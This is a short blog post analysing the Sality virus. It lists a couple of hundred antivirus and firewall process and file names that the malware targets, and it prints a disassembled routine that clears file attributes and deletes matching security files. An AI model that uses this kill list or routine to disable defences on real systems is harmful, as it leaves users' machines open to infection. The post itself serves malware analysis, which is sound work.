Wednesday, September 24, 2008

Sality ....

List of predefined security files that it deletes ...


well aside from the *.vdb, *.avc signature files ...



  • A2GUARD.
    AAVSHIELD.
    ADVCHK.
    AHNSD.
    AIRDEFENSE
    ALERTSVC
    ALOGSERV
    ALSVC.
    AMON.
    ANTI-TROJAN.
    ANTIVIR
    APVXDWIN.
    ARMOR2NET.
    ASHAVAST.
    ASHDISP.
    ASHENHCD.
    ASHMAISV.
    ASHPOPWZ.
    ASHSERV.
    ASHSIMPL.
    ASHSKPCK.
    ASHWEBSV.
    ASWUPDSV.
    ATCON.
    ATUPDATER.
    ATWATCH.
    AVAST
    AVAST
    AVAST
    AVCENTER.
    AVCIMAN.
    AVCONSOL.
    AVENGINE.
    AVESVC.
    AVGAMSVR.
    AVGCC.
    AVGCC32.
    AVGCTRL.
    AVGEMC.
    AVGFWSRV.
    AVGNT
    AVGNT.
    AVGNTDD
    AVGNTMGR
    AVGSERV.
    AVGUARD.
    AVGUPSVC.
    AVINITNT.
    AVKSERV.
    AVKSERVICE.
    AVKWCTL.
    AVP32.
    AVPCC.
    AVPM.
    AVSCHED32.
    AVSERVER.
    AVSYNMGR.
    AVWUPD32.
    AVWUPSRV.
    AVXMONITOR9X.
    AVXMONITORNT.
    AVXQUAR.
    BDMCON.
    BDNEWS.
    BDSUBMIT.
    BDSWITCH.
    BLACKD.
    BLACKICE.
    CAFIX.
    CCAPP.
    CCEVTMGR.
    CCPROXY.
    CCSETMGR.
    CFIAUDIT.
    CLAMTRAY.
    CLAMWIN.
    CLAW95.
    CUREIT
    CUREIT
    DEFWATCH.
    DRVIRUS.
    DRWADINS.
    DRWEB32W.
    DRWEBSCD.
    DRWEBUPW.
    DWEBIO
    DWEBLLIO
    EKRN.
    ESCANH95.
    ESCANHNT.
    EWIDOCTRL.
    EZANTIVIRUSREGISTRATIONCHECK.
    F-AGNT95.
    F-PROT95.
    F-SCHED.
    F-STOPW.
    FAMEH32.
    FILEMON
    FIRESVC.
    FIRETRAY.
    FIREWALL.
    FPAVUPDM.
    FRESHCLAM.
    FSAV32.
    FSAVGUI.
    FSBWSYS.
    FSDFWD.
    FSGK32.
    FSGK32ST.
    FSGUIEXE.
    FSMA32.
    FSMB32.
    FSPEX.
    FSSM32.
    GCASDTSERV.
    GCASSERV.
    GIANTANTISPYWAREMAIN.
    GIANTANTISPYWAREUPDATER.
    GUARDGUI.
    GUARDNT.
    HREGMON.
    HRRES.
    HSOCKPE.
    HUPDATE.
    IAMAPP.
    IAMSERV.
    ICLOAD95.
    ICLOADNT.
    ICMON.
    ICSSUPPNT.
    ICSUPP95.
    ICSUPPNT.
    IFACE.
    INETUPD.
    INOCIT.
    INORPC.
    INORT.
    INOTASK.
    INOUPTNG.
    IOMON98.
    ISAFE.
    ISATRAY.
    ISRV95.
    ISSVC.
    KAVMM.
    KAVPF.
    KAVPFW.
    KAVSTART.
    KAVSVC.
    KAVSVCUI.
    KMAILMON.
    KPFWSVC.
    MCAGENT.
    MCMNHDLR.
    MCREGWIZ.
    MCUPDATE.
    MCVSSHLD.
    MINILOG.
    MYAGTSVC.
    MYAGTTRY.
    NAVAPSVC.
    NAVAPW32.
    NAVLU32.
    NAVW32.
    NEOWATCHLOG.
    NEOWATCHTRAY.
    NISSERV
    NISUM.
    NMAIN.
    NOD32
    NOD32
    NORMIST.
    NOTSTART.
    NPAVTRAY.
    NPFMNTOR.
    NPFMSG.
    NPROTECT.
    NSCHED32.
    NSMDTR.
    NSSSERV.
    NSSTRAY.
    NTOS.
    NTRTSCAN.
    NTXCONFIG.
    NUPGRADE.
    NVCOD.
    NVCTE.
    NVCUT.
    NWSERVICE.
    OFCPFWSVC.
    OP_MON.
    OUTPOST
    PAVFIRES.
    PAVFNSVR.
    PAVKRE.
    PAVPROT.
    PAVPROXY.
    PAVPRSRV.
    PAVSRV51.
    PAVSS.
    PCCGUIDE.
    PCCIOMON.
    PCCNTMON.
    PCCPFW.
    PCCTLCOM.
    PCTAV.
    PERSFW.
    PERTSK.
    PERVAC.
    PNMSRV.
    POP3TRAP.
    POPROXY.
    PREVSRV.
    PSIMSVC.
    QHM32.
    QHONLINE.
    QHONSVC.
    QHPF.
    QHWSCSVC.
    RAVMON.
    RAVTIMER.
    RFWMAIN.
    RTVSCAN.
    RTVSCN95.
    RULAUNCH.
    SAVADMINSERVICE.
    SAVMAIN.
    SAVPROGRESS.
    SAVSCAN.
    SCANNINGPROCESS.
    SDHELP.
    SHSTAT.
    SITECLI.
    SPBBCSVC.
    SPHINX.
    SPIDERCPL.
    SPIDERML.
    SPIDERNT.
    SPIDERUI.
    SPYBOTSD.
    SPYXX.
    SS3EDIT.
    STOPSIGNAV.
    SWAGENT.
    SWDOCTOR.
    SWNETSUP.
    SYMLCSVC.
    SYMPROXYSVC.
    SYMSPORT.
    SYMWSC.
    SYNMGR.
    TAUMON.
    TBMON.
    TFAK.
    THAV.
    THSM.
    TMAS.
    TMLISTEN.
    TMNTSRV.
    TMPFW.
    TMPROXY.
    TNBUTIL.
    TRJSCAN.
    UP2DATE.
    VBA32ECM.
    VBA32IFS.
    VBA32LDR.
    VBA32PP3.
    VBSNTW.
    VCHK.
    VCRMON.
    VETTRAY.
    VIRUSKEEPER.
    VPTRAY.
    VRFWSVC.
    VRMONNT.
    VRMONSVC.
    VRRW32.
    VSECOMR.
    VSHWIN32.
    VSMON.
    VSSERV.
    VSSTAT.
    WATCHDOG.
    WEBPROXY.
    WEBSCANX.
    WEBTRAP.
    WGFE95.
    WINAW32.
    WINROUTE.
    WINSS.
    WINSSNOTIFY.
    WRCTRL.
    XCOMMSVR.
    ZAUINST
    ZLCLIENT
    _AVPM.
    ZONEALARM






0103B94E CALL DWORD PTR DS:[105316C] ; kernel32.FindNextFileA
0103B954 TEST EAX,EAX
0103B956 JE 0103BA22
0103B95C MOV EDX,DWORD PTR SS:[EBP-54C]
0103B962 MOV BYTE PTR SS:[EBP+EDX-548],0
0103B96A LEA EAX,DWORD PTR SS:[EBP-118]
0103B970 PUSH EAX
0103B971 LEA ECX,DWORD PTR SS:[EBP-548]
0103B977 PUSH ECX
0103B978 CALL DWORD PTR DS:[1053160] ; kernel32.lstrcatA
0103B97E LEA EDX,DWORD PTR SS:[EBP-548]
0103B984 PUSH EDX
0103B985 CALL DWORD PTR DS:[1053164] ; kernel32.lstrlenA
0103B98B SUB EAX,4
0103B98E MOV DWORD PTR SS:[EBP-4],EAX
0103B991 LEA EAX,DWORD PTR SS:[EBP-118]
0103B997 PUSH EAX
0103B998 CALL DWORD PTR DS:[1053164] ; kernel32.lstrlenA
0103B99E CMP EAX,4
0103B9A1 JLE SHORT 0103B9D0
0103B9A3 MOV ECX,DWORD PTR DS:[1054188]
0103B9A9 PUSH ECX
0103B9AA MOV EDX,DWORD PTR SS:[EBP-4]
0103B9AD LEA EAX,DWORD PTR SS:[EBP+EDX-548]
0103B9B4 PUSH EAX
0103B9B5 CALL DWORD PTR DS:[10530B4] ; kernel32.lstrcmpiA
0103B9BB TEST EAX,EAX
0103B9BD JNZ SHORT 0103B9D0
0103B9BF PUSH 1
0103B9C1 LEA ECX,DWORD PTR SS:[EBP-548]
0103B9C7 PUSH ECX
0103B9C8 CALL 0103B79C

--------------------------------------------------


0103B79C PUSH EBP
0103B79D MOV EBP,ESP
0103B79F CMP DWORD PTR SS:[EBP+C],0
0103B7A3 JNZ SHORT 0103B7BD
0103B7A5 PUSH 0
0103B7A7 PUSH 2
0103B7A9 MOV EAX,DWORD PTR SS:[EBP+8]
0103B7AC PUSH EAX
0103B7AD CALL 0103CAC0
0103B7B2 ADD ESP,0C
0103B7B5 TEST EAX,EAX
0103B7B7 JNZ SHORT 0103B7BB
0103B7B9 JMP SHORT 0103B7D7
0103B7BB JMP SHORT 0103B7D3
0103B7BD PUSH 20
0103B7BF MOV ECX,DWORD PTR SS:[EBP+8]
0103B7C2 PUSH ECX
0103B7C3 CALL DWORD PTR DS:[1053080] ; kernel32.SetFileAttributesA
0103B7C9 MOV EDX,DWORD PTR SS:[EBP+8]
0103B7CC PUSH EDX
0103B7CD CALL DWORD PTR DS:[105307C] ; kernel32.DeleteFileA
0103B7D3 XOR EAX,EAX
0103B7D5 JMP SHORT 0103B7D9
0103B7D7 JMP SHORT 0103B7BD
0103B7D9 POP EBP
0103B7DA RETN


EOF
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)